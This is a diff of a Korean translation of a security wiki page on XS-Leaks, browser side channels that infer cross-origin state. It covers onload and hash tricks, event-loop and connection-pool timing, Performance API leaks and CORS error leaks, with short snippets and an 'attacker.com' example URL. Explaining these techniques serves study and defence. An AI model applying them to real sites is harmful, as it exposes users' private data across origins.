+[Framing Protections](https://xsleaks.dev/docs/defenses/opt-in/xfo/)이 없는 경우, 페이지와 그 하위 리소스가 네트워크를 통해 로드되는 데 필요한 시간을 공격자가 측정할 수 있는 것으로 관찰되었습니다. 이 측정은 일반적으로 iframe의 `onload` 핸들러가 리소스 로드 및 JavaScript 실행이 완료된 후에만 트리거되기 때문에 가능합니다. 스크립트 실행으로 인한 변동성을 우회하기 위해 공격자는 `<iframe>` 내에서 [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) 속성을 사용할 수 있습니다. 이 속성을 포함하면 JavaScript 실행과 같은 여러 기능이 제한되어 네트워크 성능에 주로 영향을 받는 측정을 용이하게 합니다.
 ```javascript
 // Example of an iframe with the sandbox attribute
 <iframe src="example.html" sandbox></iframe>
@@ -131,28 +131,28 @@ performance.now-+-force-heavy-task.md
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: Page Content
 - **More info**:
-- **Summary**: 페이지에 올바른 콘텐츠에 접근할 때 오류가 발생하게 하고, 어떤 콘텐츠에 접근할 때도 올바르게 로드되게 할 수 있다면, 시간을 측정하지 않고 모든 정보를 추출하는 루프를 만들 수 있습니다.
+- **Summary**: 페이지에 올바른 콘텐츠에 접근할 때 오류가 발생하고, 어떤 콘텐츠에 접근할 때 올바르게 로드되도록 할 수 있다면, 시간을 측정하지 않고 모든 정보를 추출하는 루프를 만들 수 있습니다.
 - **Code Example**:
 
-비밀 콘텐츠가 있는 페이지를 **Iframe** 안에 **삽입**할 수 있다고 가정해 보겠습니다.
+비밀 콘텐츠가 포함된 페이지를 **Iframe** 안에 **삽입**할 수 있다고 가정해 보겠습니다.
 
-피해자가 **Iframe**을 사용하여 "_**flag**_"가 포함된 파일을 **검색**하게 만들 수 있습니다(예: CSRF를 악용). Iframe 안에서는 _**onload event**_가 **항상 최소한 한 번은 실행**될 것이라는 것을 알고 있습니다. 그런 다음, **URL**의 **iframe**을 **변경**할 수 있지만 URL의 **hash**의 **내용**만 변경합니다.
+피해자가 **Iframe**을 사용하여 "_**flag**_"가 포함된 파일을 **검색**하도록 만들 수 있습니다(예: CSRF를 악용). Iframe 안에서는 _**onload event**_가 **항상 최소한 한 번은 실행**될 것이라는 것을 알고 있습니다. 그런 다음 **URL**의 **iframe**을 변경할 수 있지만 URL의 **hash**의 **내용**만 변경합니다.
 
 예를 들어:
 
 1. **URL1**: www.attacker.com/xssearch#try1
 2. **URL2**: www.attacker.com/xssearch#try2
 
-첫 번째 URL이 **성공적으로 로드**되었다면, **URL의 hash** 부분을 **변경**할 때 **onload** 이벤트가 **다시 트리거되지 않습니다**. 그러나 페이지가 **로드**할 때 어떤 종류의 **오류**가 발생했다면, **onload** 이벤트가 **다시 트리거됩니다**.
+첫 번째 URL이 **성공적으로 로드**되었다면, **URL의 hash** 부분을 **변경**할 때 **onload** 이벤트는 **다시 트리거되지 않습니다**. 그러나 페이지가 **로드**할 때 어떤 종류의 **오류**가 발생했다면, **onload** 이벤트는 **다시 트리거됩니다**.
 
-그런 다음, **정상적으로** 로드된 페이지와 접근할 때 **오류**가 있는 페이지를 **구별**할 수 있습니다.
+그런 다음 **정상적으로** 로드된 페이지와 접근할 때 **오류**가 있는 페이지를 **구별**할 수 있습니다.
 
 ### Javascript Execution
 
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: Page Content
 - **More info**:
-- **Summary:** 페이지가 **민감한** 콘텐츠를 **반환**하거나 사용자가 **제어할 수 있는** 콘텐츠를 반환하는 경우. 사용자는 **부정적인 경우**에 **유효한 JS 코드를 설정**할 수 있으며, 각 시도마다 **`<script>`** 태그 안에 **로드**하여, **부정적인** 경우 공격자의 **코드**가 **실행되고**, **긍정적인** 경우에는 **아무것도** 실행되지 않습니다.
+- **Summary:** 페이지가 **민감한** 콘텐츠를 **반환**하거나 사용자가 **제어할 수 있는** 콘텐츠를 반환하는 경우, 사용자는 **부정적인 경우에 유효한 JS 코드를 설정**할 수 있으며, 각 시도 안에 **`<script>`** 태그를 로드하여 **부정적인** 경우 공격자의 **코드**가 **실행되고**, **긍정적인** 경우에는 **아무것도** 실행되지 않습니다.
 - **Code Example:**
 
 {{#ref}}
@@ -177,7 +177,7 @@ javascript-execution-xs-leak.md
 - **Summary**: id 또는 name 속성에서 민감한 데이터를 유출합니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
 
-페이지를 **iframe** 안에 **로드**하고 **`#id_value`**를 사용하여 페이지가 지정된 요소에 **포커스**를 맞추게 할 수 있습니다. 그런 다음 **`onblur`** 신호가 트리거되면 ID 요소가 존재합니다.\
+**iframe** 안에 페이지를 **로드**하고 **`#id_value`**를 사용하여 페이지가 지정된 요소에 **포커스**를 맞추도록 할 수 있습니다. 그런 다음 **`onblur`** 신호가 트리거되면 ID 요소가 존재합니다.\
 **`portal`** 태그로 동일한 공격을 수행할 수 있습니다.
 
 ### postMessage Broadcasts <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
@@ -214,7 +214,7 @@ javascript-execution-xs-leak.md
 
 이 XS-Leak는 공격자가 **교차 출처 페이지가 결제 요청을 시작할 때** 감지할 수 있게 합니다.
 
-**결제 요청**은 한 번에 하나만 활성화될 수 있기 때문에, 대상 웹사이트가 Payment Request API를 사용하고 있다면, 이 API를 사용하려는 추가 시도는 실패하게 되고 **JavaScript 예외**를 발생시킵니다. 공격자는 **주기적으로 Payment API UI를 표시하려고 시도**하여 이를 악용할 수 있습니다. 하나의 시도가 예외를 발생시키면, 대상 웹사이트가 현재 이를 사용하고 있는 것입니다. 공격자는 생성 후 즉시 UI를 닫아 이러한 주기적인 시도를 숨길 수 있습니다.
+**결제 요청** API를 사용하는 경우, **한 번에 하나의 결제 요청만 활성화**될 수 있으므로, 대상 웹사이트가 Payment Request API를 사용하고 있다면, 이 API를 사용하려는 추가 시도는 실패하고 **JavaScript 예외**를 발생시킵니다. 공격자는 **주기적으로 Payment API UI를 표시하려고 시도**하여 이를 악용할 수 있습니다. 하나의 시도가 예외를 발생시키면, 대상 웹사이트가 현재 이를 사용하고 있다는 것을 알 수 있습니다. 공격자는 생성 후 즉시 UI를 닫아 이러한 주기적인 시도를 숨길 수 있습니다.
 
 ### Timing the Event Loop <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
 
@@ -228,7 +228,7 @@ javascript-execution-xs-leak.md
 event-loop-blocking-+-lazy-images.md
 {{#endref}}
 
-JavaScript는 [단일 스레드 이벤트 루프](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) 동시성 모델에서 작동하며, 이는 **한 번에 하나의 작업만 실행할 수 있음을 의미합니다**. 이 특성은 **다른 출처의 코드 실행에 걸리는 시간을 측정하는 데 악용될 수 있습니다**. 공격자는 고정 속성을 가진 이벤트를 지속적으로 전송하여 이벤트 루프에서 자신의 코드 실행 시간을 측정할 수 있습니다. 이러한 이벤트는 이벤트 풀에 빈 공간이 있을 때 처리됩니다. 다른 출처도 동일한 풀에 이벤트를 전송하고 있다면, **공격자는 자신의 작업 실행 지연을 관찰하여 이러한 외부 이벤트가 실행되는 데 걸리는 시간을 추론할 수 있습니다**. 지연에 대한 이벤트 루프 모니터링 방법은 다른 출처의 코드 실행 시간을 드러내어 민감한 정보를 노출할 수 있습니다.
+JavaScript는 [단일 스레드 이벤트 루프](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) 동시성 모델에서 작동하며, 이는 **한 번에 하나의 작업만 실행할 수 있음을 의미합니다**. 이 특성은 **다른 출처의 코드가 실행되는 데 걸리는 시간을 측정하는 데 악용될 수 있습니다**. 공격자는 고정 속성을 가진 이벤트를 지속적으로 전송하여 이벤트 루프에서 자신의 코드 실행 시간을 측정할 수 있습니다. 이러한 이벤트는 이벤트 풀에 비어 있을 때 처리됩니다. 다른 출처도 동일한 풀에 이벤트를 전송하는 경우, **공격자는 자신의 작업 실행 지연을 관찰하여 이러한 외부 이벤트가 실행되는 데 걸리는 시간을 추론할 수 있습니다**. 이벤트 루프의 지연을 모니터링하는 이 방법은 다른 출처의 코드 실행 시간을 드러낼 수 있으며, 잠재적으로 민감한 정보를 노출할 수 있습니다.
 
 > [!WARNING]
 > 실행 시간 측정에서는 **네트워크 요인**을 **제거**하여 **더 정확한 측정값**을 얻을 수 있습니다. 예를 들어, 페이지를 로드하기 전에 페이지에서 사용하는 리소스를 로드함으로써 가능합니다.
@@ -238,10 +238,10 @@ JavaScript는 [단일 스레드 이벤트 루프](https://developer.mozilla.org/
 - **Inclusion Methods**:
 - **Detectable Difference**: Timing (generally due to Page Content, Status Code)
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
-- **Summary:** 웹 작업의 실행 시간을 측정하는 한 가지 방법은 스레드의 이벤트 루프를 의도적으로 차단한 다음 **이벤트 루프가 다시 사용 가능해지는 데 걸리는 시간을 측정하는 것입니다**. 차단 작업(예: 긴 계산 또는 동기 API 호출)을 이벤트 루프에 삽입하고, 후속 코드가 실행되기 시작하는 데 걸리는 시간을 모니터링함으로써, 차단 기간 동안 이벤트 루프에서 실행 중이던 작업의 지속 시간을 추론할 수 있습니다. 이 기술은 JavaScript의 이벤트 루프가 단일 스레드로 작업을 순차적으로 실행하는 특성을 활용하며, 동일한 스레드를 공유하는 다른 작업의 성능이나 동작에 대한 통찰력을 제공할 수 있습니다.
+- **Summary:** 웹 작업의 실행 시간을 측정하는 한 가지 방법은 스레드의 이벤트 루프를 의도적으로 차단한 다음 **이벤트 루프가 다시 사용 가능해지는 데 걸리는 시간을 측정하는 것입니다**. 이벤트 루프에 차단 작업(예: 긴 계산 또는 동기 API 호출)을 삽입하고, 후속 코드가 실행되기 시작하는 데 걸리는 시간을 모니터링함으로써, 차단 기간 동안 이벤트 루프에서 실행 중인 작업의 지속 시간을 추론할 수 있습니다. 이 기술은 JavaScript의 이벤트 루프가 단일 스레드로 작동하여 작업이 순차적으로 실행되는 특성을 활용하며, 동일한 스레드를 공유하는 다른 작업의 성능이나 동작에 대한 통찰력을 제공할 수 있습니다.
 - **Code Example**:
 
-이벤트 루프를 잠금으로써 실행 시간을 측정하는 기술의 중요한 장점은 **사이트 격리**를 우회할 수 있는 잠재력입니다. **사이트 격리**는 서로 다른 웹사이트를 별도의 프로세스로 분리하는 보안 기능으로, 악의적인 사이트가 다른 사이트의 민감한 데이터에 직접 접근하는 것을 방지하는 것을 목표로 합니다. 그러나 공유 이벤트 루프를 통해 다른 출처의 실행 시간을 영향을 미침으로써, 공격자는 해당 출처의 활동에 대한 정보를 간접적으로 추출할 수 있습니다. 이 방법은 다른 출처의 데이터에 대한 직접적인 접근에 의존하지 않고, 오히려 해당 출처의 활동이 공유 이벤트 루프에 미치는 영향을 관찰하여 **사이트 격리**가 설정한 보호 장벽을 회피합니다.
+이벤트 루프를 잠금으로써 실행 시간을 측정하는 기술의 중요한 장점은 **사이트 격리**를 우회할 수 있는 잠재력입니다. **사이트 격리**는 서로 다른 웹사이트를 별도의 프로세스로 분리하여 악의적인 사이트가 다른 사이트의 민감한 데이터에 직접 접근하는 것을 방지하는 보안 기능입니다. 그러나 공격자는 공유 이벤트 루프를 통해 다른 출처의 실행 타이밍에 영향을 미침으로써 해당 출처의 활동에 대한 정보를 간접적으로 추출할 수 있습니다. 이 방법은 다른 출처의 데이터에 대한 직접적인 접근에 의존하지 않고, 오히려 해당 출처의 활동이 공유 이벤트 루프에 미치는 영향을 관찰하여 **사이트 격리**에 의해 설정된 보호 장벽을 회피합니다.
 
 > [!WARNING]
 > 실행 시간 측정에서는 **네트워크 요인**을 **제거**하여 **더 정확한 측정값**을 얻을 수 있습니다. 예를 들어, 페이지를 로드하기 전에 페이지에서 사용하는 리소스를 로드함으로써 가능합니다.
@@ -251,19 +251,19 @@ JavaScript는 [단일 스레드 이벤트 루프](https://developer.mozilla.org/
 - **Inclusion Methods**: JavaScript Requests
 - **Detectable Difference**: Timing (generally due to Page Content, Status Code)
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
-- **Summary:** 공격자는 모든 소켓을 1개를 제외하고 잠그고, 대상 웹을 로드하며 동시에 다른 페이지를 로드할 수 있습니다. 마지막 페이지가 로드되기 시작하는 시간은 대상 페이지가 로드되는 데 걸린 시간입니다.
+- **Summary:** 공격자는 모든 소켓을 잠그고 1개를 제외한 후, 대상 웹을 로드하고 동시에 다른 페이지를 로드하여 마지막 페이지가 로드되기 시작하는 시간은 대상 페이지가 로드되는 데 걸린 시간입니다.
 - **Code Example**:
 
 {{#ref}}
 connection-pool-example.md
 {{#endref}}
 
-브라우저는 서버 통신을 위해 소켓을 사용하지만, 운영 체제와 하드웨어의 제한된 자원으로 인해 **브라우저는 동시 소켓 수에 제한을 두어야 합니다**. 공격자는 다음 단계를 통해 이 제한을 악용할 수 있습니다:
+브라우저는 서버 통신을 위해 소켓을 사용하지만, 운영 체제와 하드웨어의 제한된 리소스 때문에 **브라우저는 동시 소켓 수에 제한을 두어야 합니다**. 공격자는 다음 단계를 통해 이 제한을 악용할 수 있습니다:
 
 1. 브라우저의 소켓 한도를 확인합니다. 예를 들어, 256개의 전역 소켓.
-2. 255개의 소켓을 다양한 호스트에 대한 255개의 요청을 시작하여 오랜 시간 동안 점유합니다. 이 요청은 연결을 열어두고 완료되지 않도록 설계됩니다.
+2. 255개의 요청을 다양한 호스트에 보내어 255개의 소켓을 오랜 시간 동안 점유하여 연결을 열어 둡니다.
 3. 256번째 소켓을 사용하여 대상 페이지에 요청을 보냅니다.
-4. 다른 호스트에 257번째 요청을 시도합니다. 모든 소켓이 사용 중이므로(2단계와 3단계에 따라) 이 요청은 소켓이 사용 가능해질 때까지 대기열에 놓입니다. 이 요청이 진행되기까지의 지연 시간은 공격자에게 256번째 소켓(대상 페이지의 소켓)과 관련된 네트워크 활동에 대한 시간 정보를 제공합니다. 이는 2단계에서 255개의 소켓이 여전히 사용 중이므로, 새로 사용 가능한 소켓은 3단계에서 해제된 소켓이어야 함을 의미합니다. 따라서 256번째 소켓이 사용 가능해지는 데 걸린 시간은 대상 페이지에 대한 요청이 완료되는 데 걸린 시간과 직접적으로 연결됩니다.
+4. 다른 호스트에 257번째 요청을 시도합니다. 모든 소켓이 사용 중이므로(2단계와 3단계에 따라) 이 요청은 소켓이 사용 가능해질 때까지 대기열에 놓입니다. 이 요청이 진행되기까지의 지연 시간은 공격자에게 256번째 소켓(대상 페이지의 소켓)과 관련된 네트워크 활동에 대한 시간 정보를 제공합니다. 이 추론은 2단계에서 255개의 소켓이 여전히 사용 중이므로, 새로 사용 가능한 소켓은 3단계에서 해제된 소켓이어야 함을 의미합니다. 따라서 256번째 소켓이 사용 가능해지는 데 걸린 시간은 대상 페이지에 대한 요청이 완료되는 데 걸린 시간과 직접적으로 연결됩니다.
 
 더 많은 정보: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
 
@@ -272,15 +272,15 @@ connection-pool-example.md
 - **Inclusion Methods**: JavaScript Requests
 - **Detectable Difference**: Timing (generally due to Page Content, Status Code)
 - **More info**:
-- **Summary:** 이전 기술과 유사하지만 모든 소켓을 사용하는 대신 Google **Chrome**은 **동일한 출처에 대해 6개의 동시 요청**에 제한을 둡니다. **5개를 차단**한 다음 **6번째** 요청을 시작하면 **시간을 측정**할 수 있으며, **피해자 페이지가** 동일한 엔드포인트에 더 많은 **요청을 보내도록** 만들 수 있다면, **6번째 요청**은 **더 오래 걸리며** 이를 감지할 수 있습니다.
+- **Summary:** 이전 기술과 유사하지만 모든 소켓을 사용하는 대신 Google **Chrome**은 **동일한 출처에 대해 6개의 동시 요청**으로 제한합니다. **5개를 차단**한 후 **6번째** 요청을 시작하면 **시간을 측정**할 수 있으며, **피해자 페이지가** 동일한 엔드포인트에 더 많은 **요청을 보내도록** 만들 수 있다면, **6번째 요청**은 **더 오래 걸리며** 이를 감지할 수 있습니다.
 
 ## Performance API Techniques
 
 [`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance)는 웹 애플리케이션의 성능 메트릭에 대한 통찰력을 제공하며, [`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API)로 더욱 풍부해집니다. Resource Timing API는 요청의 지속 시간과 같은 상세한 네트워크 요청 타이밍을 모니터링할 수 있게 해줍니다. 특히 서버가 응답에 `Timing-Allow-Origin: *` 헤더를 포함하면 전송 크기 및 도메인 조회 시간과 같은 추가 데이터가 제공됩니다.
 
-이 풍부한 데이터는 [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) 또는 [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName)와 같은 메서드를 통해 검색할 수 있으며, 성능 관련 정보에 대한 포괄적인 뷰를 제공합니다. 또한 API는 [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now)에서 얻은 타임스탬프 간의 차이를 계산하여 실행 시간을 측정할 수 있게 해줍니다. 그러나 Chrome과 같은 브라우저의 특정 작업에 대해 `performance.now()`의 정밀도가 밀리초로 제한될 수 있어 타이밍 측정의 세분성에 영향을 미칠 수 있습니다.
+이 풍부한 데이터는 [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) 또는 [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName)와 같은 메서드를 통해 검색할 수 있으며, 성능 관련 정보에 대한 포괄적인 뷰를 제공합니다. 또한 이 API는 [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now)에서 얻은 타임스탬프의 차이를 계산하여 실행 시간을 측정할 수 있게 해줍니다. 그러나 Chrome과 같은 브라우저의 특정 작업에 대해 `performance.now()`의 정밀도가 밀리초로 제한될 수 있어 타이밍 측정의 세분성에 영향을 미칠 수 있습니다.
 
-타이밍 측정 외에도 Performance API는 보안 관련 통찰력을 제공하는 데 활용될 수 있습니다. 예를 들어, Chrome의 `performance` 객체에 페이지가 존재하는지 여부는 `X-Frame-Options`의 적용을 나타낼 수 있습니다. 구체적으로, `X-Frame-Options`로 인해 프레임에서 렌더링이 차단된 페이지는 `performance` 객체에 기록되지 않으며, 이는 페이지의 프레이밍 정책에 대한 미세한 단서를 제공합니다.
+타이밍 측정 외에도 Performance API는 보안 관련 통찰력을 제공하는 데 활용될 수 있습니다. 예를 들어, Chrome의 `performance` 객체에 페이지가 존재하는지 여부는 `X-Frame-Options`의 적용을 나타낼 수 있습니다. 특히, `X-Frame-Options`로 인해 프레임에서 렌더링이 차단된 페이지는 `performance` 객체에 기록되지 않으므로 페이지의 프레이밍 정책에 대한 미세한 단서를 제공합니다.
 
 ### Error Leak
 
@@ -290,7 +290,7 @@ connection-pool-example.md
 - **Summary:** 오류가 발생하는 요청은 리소스 타이밍 항목을 생성하지 않습니다.
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Error%20Leak](https://xsinator.com/testing.html#Performance%20API%20Error%20Leak)
 
-HTTP 응답 상태 코드를 **구별**할 수 있습니다. 오류로 이어지는 요청은 **성능 항목을 생성하지 않습니다**.
+HTTP 응답 상태 코드를 **구별**할 수 있습니다. 오류로 이어지는 요청은 **성능 항목**을 생성하지 않기 때문입니다.
 
 ### Style Reload Error
 
@@ -327,10 +327,10 @@ HTTP 응답 상태 코드를 **구별**할 수 있습니다. 오류로 이어지
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: Page Content
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** 보안 주장에서 XSS 감사기를 사용하여, 공격자는 조작된 페이로드가 감사기의 필터링 메커니즘을 트리거할 때 응답의 변화를 관찰하여 특정 웹 페이지 요소를 감지할 수 있습니다.
+- **Summary:** 보안 주장에서 XSS 감사기를 사용하여 공격자는 조작된 페이로드가 감사기의 필터링 메커니즘을 트리거할 때 응답의 변화를 관찰하여 특정 웹 페이지 요소를 감지할 수 있습니다.
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak](https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak)
 
-보안 주장(SA)에서 XSS 감사기는 원래 교차 사이트 스크립팅(XSS) 공격을 방지하기 위해 설계되었지만, 역설적으로 민감한 정보를 유출하는 데 악용될 수 있습니다. 이 내장 기능은 Google Chrome(GC)에서 제거되었지만, SA에서는 여전히 존재합니다. 2013년 Braun과 Heiderich는 XSS 감사기가 합법적인 스크립트를 우연히 차단하여 잘못된 긍정을 초래할 수 있음을 보여주었습니다. 이를 바탕으로 연구자들은 정보를 추출하고 교차 출처 페이지에서 특정 콘텐츠를 감지하는 기술을 개발했습니다. 이 개념은 XS-Leaks로 알려져 있으며, 처음에는 Terada에 의해 보고되었고 Heyes의 블로그 게시물에서 자세히 설명되었습니다. 이러한 기술은 GC의 XSS 감사기에 특정했지만, SA에서는 XSS 감사기에 의해 차단된 페이지가 Performance API에 항목을 생성하지 않으므로 민감한 정보가 여전히 유출될 수 있는 방법이 밝혀졌습니다.
+보안 주장(SA)에서 XSS 감사기는 원래 교차 사이트 스크립팅(XSS) 공격을 방지하기 위해 설계되었지만, 역설적으로 민감한 정보를 유출하는 데 악용될 수 있습니다. 이 내장 기능은 Google Chrome(GC)에서 제거되었지만 SA에는 여전히 존재합니다. 2013년 Braun과 Heiderich는 XSS 감사기가 정당한 스크립트를 우연히 차단하여 잘못된 긍정을 초래할 수 있음을 보여주었습니다. 이를 바탕으로 연구자들은 교차 출처 페이지에서 정보를 추출하고 특정 콘텐츠를 감지하는 기술을 개발했습니다. 이 개념은 XS-Leaks로 알려져 있으며, 처음에는 Terada에 의해 보고되었고 Heyes의 블로그 게시물에서 자세히 설명되었습니다. 이러한 기술은 GC의 XSS 감사기에 특정했지만, SA에서는 XSS 감사기에 의해 차단된 페이지가 Performance API에 항목을 생성하지 않으므로 민감한 정보가 여전히 유출될 수 있는 방법이 밝혀졌습니다.
 
 ### X-Frame Leak
 
@@ -340,7 +340,7 @@ HTTP 응답 상태 코드를 **구별**할 수 있습니다. 오류로 이어지
 - **Summary:** X-Frame-Options 헤더가 있는 리소스는 리소스 타이밍 항목을 생성하지 않습니다.
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak](https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak)
 
-페이지가 **iframe**에서 **렌더링**되는 것이 **허용되지 않는 경우**, 성능 항목을 **생성하지 않습니다**. 결과적으로 공격자는 응답 헤더 **`X-Frame-Options`**를 감지할 수 있습니다.\
+페이지가 **iframe**에서 **렌더링**되는 것이 **허용되지 않는 경우** 성능 항목을 생성하지 않습니다. 결과적으로 공격자는 응답 헤더 **`X-Frame-Options`**를 감지할 수 있습니다.\
 **embed** **태그**를 사용할 때도 마찬가지입니다.
 
 ### Download Detection
@@ -361,7 +361,7 @@ HTTP 응답 상태 코드를 **구별**할 수 있습니다. 오류로 이어지
 - **Summary:** 리소스 타이밍 항목은 리디렉션의 시작 시간을 유출합니다.
 - **Code Example**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)
 
-일부 브라우저가 교차 출처 요청에 대해 너무 많은 정보를 기록하는 동작을 악용하는 XS-Leak 인스턴스를 발견했습니다. 표준은 교차 출처 리소스에 대해 설정해야 하는 속성의 하위 집합을 정의합니다. 그러나 **SA**에서는 사용자가 대상 페이지에 의해 **리디렉션**되었는지 감지할 수 있습니다. **Performance API**를 쿼리하고 **redirectStart timing data**를 확인하여 가능합니다.
+일부 브라우저가 교차 출처 요청에 대해 너무 많은 정보를 기록하는 동작을 악용하는 XS-Leak 인스턴스를 발견했습니다. 표준은 교차 출처 리소스에 대해 설정해야 하는 속성의 하위 집합을 정의합니다. 그러나 **SA**에서는 사용자가 대상 페이지에 의해 **리디렉션**되었는지 감지할 수 있습니다. **Performance API**를 쿼리하고 **redirectStart 타이밍 데이터**를 확인하여 가능합니다.
 
 ### Duration Redirect Leak
 
@@ -371,7 +371,7 @@ HTTP 응답 상태 코드를 **구별**할 수 있습니다. 오류로 이어지
 - **Summary:** 리디렉션이 발생할 때 타이밍 항목의 지속 시간이 음수입니다.
 - **Code Example**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)
 
-GC에서 **리디렉션**이 발생하는 요청의 **지속 시간**은 **음수**이며, 따라서 리디렉션이 발생하지 않는 요청과 **구별**할 수 있습니다.
+GC에서 **리디렉션**이 발생하는 요청의 **지속 시간**은 **음수**이며, 따라서 **리디렉션이 발생하지 않는 요청**과 **구별**할 수 있습니다.
 
 ### CORP Leak
 
@@ -381,7 +381,7 @@ GC에서 **리디렉션**이 발생하는 요청의 **지속 시간**은 **음
 - **Summary:** CORP로 보호된 리소스는 리소스 타이밍 항목을 생성하지 않습니다.
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak](https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak)
 
-일부 경우, **nextHopProtocol entry**를 누출 기술로 사용할 수 있습니다. GC에서 **CORP header**가 설정되면 nextHopProtocol은 **비어 있습니다**. SA는 CORP가 활성화된 리소스에 대해 성능 항목을 전혀 생성하지 않는다는 점에 유의하십시오.
+일부 경우, **nextHopProtocol 항목**을 유출 기술로 사용할 수 있습니다. GC에서 **CORP 헤더**가 설정되면 nextHopProtocol은 **비어 있습니다**. SA는 CORP가 활성화된 리소스에 대해 성능 항목을 전혀 생성하지 않는다는 점에 유의하십시오.
 
 ### Service Worker
 
@@ -391,9 +391,9 @@ GC에서 **리디렉션**이 발생하는 요청의 **지속 시간**은 **음
 - **Summary:** 특정 출처에 대해 서비스 워커가 등록되어 있는지 감지합니다.
 - **Code Example**:
 
-서비스 워커는 출처에서 실행되는 이벤트 기반 스크립트 컨텍스트입니다. 이들은 웹 페이지의 백그라운드에서 실행되며, 리소스를 가로채고 수정하며 **캐시**하여 오프라인 웹 애플리케이션을 생성할 수 있습니다.\
-**서비스 워커**에 의해 **캐시된 리소스**가 **iframe**을 통해 접근되면, 해당 리소스는 **서비스 워커 캐시**에서 **로드**됩니다.\
-리소스가 **서비스 워커** 캐시에서 **로드**되었는지 감지하기 위해 **Performance API**를 사용할 수 있습니다.\
+서비스 워커는 출처에서 실행되는 이벤트 기반 스크립트 컨텍스트입니다. 이들은 웹 페이지의 백그라운드에서 실행되며, 리소스를 가로채고 수정하며 **오프라인 웹 애플리케이션**을 만들기 위해 리소스를 캐시할 수 있습니다.\
+**서비스 워커**에 의해 **캐시된 리소스**가 **iframe**을 통해 접근되면, 리소스는 **서비스 워커 캐시**에서 **로드됩니다**.\
+리소스가 **서비스 워커** 캐시에서 **로드되었는지 감지하기 위해 Performance API를 사용할 수 있습니다.\
 이것은 타이밍 공격으로도 수행할 수 있습니다(자세한 정보는 논문을 참조하십시오).
 
 ### Cache
@@ -470,27 +470,27 @@ err.message +
 audioElement.onerror = errHandler
 }
 ```
-`MediaError` 인터페이스의 message 속성은 성공적으로 로드된 리소스를 고유하게 식별하는 독특한 문자열을 제공합니다. 공격자는 이 기능을 악용하여 메시지 내용을 관찰함으로써 교차 출처 리소스의 응답 상태를 추론할 수 있습니다.
+`MediaError` 인터페이스의 message 속성은 성공적으로 로드된 리소스를 고유하게 식별하는 독특한 문자열을 제공합니다. 공격자는 이 기능을 이용해 메시지 내용을 관찰함으로써 교차 출처 리소스의 응답 상태를 유추할 수 있습니다.
 
 ### CORS 오류
 
 - **포함 방법**: Fetch API
 - **감지 가능한 차이**: 헤더
 - **자세한 정보**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
-- **요약:** 보안 주장(SA)에서 CORS 오류 메시지는 리디렉션된 요청의 전체 URL을 우연히 노출합니다.
+- **요약:** 보안 주장(SA)에서 CORS 오류 메시지는 리디렉션된 요청의 전체 URL을 무심코 노출합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
 
-이 기술은 공격자가 **교차 출처 사이트의 리디렉션 목적지를 추출**할 수 있게 해줍니다. 이는 Webkit 기반 브라우저가 CORS 요청을 처리하는 방식을 악용하는 것입니다. 구체적으로, **CORS가 활성화된 요청**이 사용자 상태에 따라 리디렉션을 발행하는 대상 사이트에 전송되고 브라우저가 요청을 거부하면, **리디렉션의 대상 URL 전체**가 오류 메시지 내에 노출됩니다. 이 취약점은 리디렉션의 사실을 드러낼 뿐만 아니라 리디렉션의 끝점과 그 안에 포함될 수 있는 **민감한 쿼리 매개변수**를 노출합니다.
+이 기술은 공격자가 **교차 출처 사이트의 리디렉션 목적지를 추출**할 수 있게 해줍니다. 이는 Webkit 기반 브라우저가 CORS 요청을 처리하는 방식을 이용하는 것입니다. 구체적으로, **CORS가 활성화된 요청**이 사용자 상태에 따라 리디렉션을 발행하는 대상 사이트에 전송되고 브라우저가 요청을 거부하면, **리디렉션의 대상 URL 전체**가 오류 메시지 내에 노출됩니다. 이 취약점은 리디렉션의 사실을 드러낼 뿐만 아니라 리디렉션의 끝점과 그 안에 포함될 수 있는 **민감한 쿼리 매개변수**를 노출합니다.
 
 ### SRI 오류
 
 - **포함 방법**: Fetch API
 - **감지 가능한 차이**: 헤더
 - **자세한 정보**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
